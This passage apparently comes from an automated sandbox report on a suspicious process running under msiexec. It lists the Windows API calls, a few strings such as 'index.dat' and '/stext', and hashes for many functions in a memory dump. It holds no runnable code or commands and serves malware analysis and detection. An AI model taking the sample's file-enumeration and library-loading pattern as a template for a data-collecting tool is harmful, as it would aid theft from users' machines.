                                                                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID: *.*$index.dat
                                                                      • API String ID: 1974802433-2863569691
                                                                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$FilePointer
                                                                      • String ID:
                                                                      • API String ID: 1156039329-0
                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                      • String ID:
                                                                      • API String ID: 1125800050-0
                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                      • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleSleep
                                                                      • String ID: }A
                                                                      • API String ID: 252777609-2138825249
                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                      APIs
                                                                      • malloc.MSVCRT ref: 00409A10
                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                      • free.MSVCRT ref: 00409A31
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: freemallocmemcpy
                                                                      • String ID:
                                                                      • API String ID: 3056473165-0
                                                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d
                                                                      • API String ID: 0-2564639436
                                                                      • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                      • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: BINARY
                                                                      • API String ID: 2221118986-907554435
                                                                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp
                                                                      • String ID: /stext
                                                                      • API String ID: 2081463915-3817206916
                                                                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                      APIs
                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                      • String ID:
                                                                      • API String ID: 2445788494-0
                                                                      • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                      • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                      APIs
                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                      • String ID:
                                                                      • API String ID: 3150196962-0
                                                                      • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                      • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                      APIs
                                                                      Strings
                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: malloc
                                                                      • String ID: failed to allocate %u bytes of memory
                                                                      • API String ID: 2803490479-1168259600
                                                                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcmpmemset
                                                                      • String ID:
                                                                      • API String ID: 1065087418-0
                                                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                      APIs
                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                      • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                      • String ID:
                                                                      • API String ID: 1381354015-0
                                                                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free
                                                                      • String ID:
                                                                      • API String ID: 1294909896-0
                                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                      APIs
                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                      • String ID:
                                                                      • API String ID: 2154303073-0
                                                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                      APIs
                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                      • String ID:
                                                                      • API String ID: 3150196962-0
                                                                      • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                      • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                      APIs
                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$PointerRead
                                                                      • String ID:
                                                                      • API String ID: 3154509469-0
                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                      APIs
                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                      • String ID:
                                                                      • API String ID: 4232544981-0
                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                      APIs
                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                      APIs
                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$FileModuleName
                                                                      • String ID:
                                                                      • API String ID: 3859505661-0
                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                      APIs
                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                      APIs
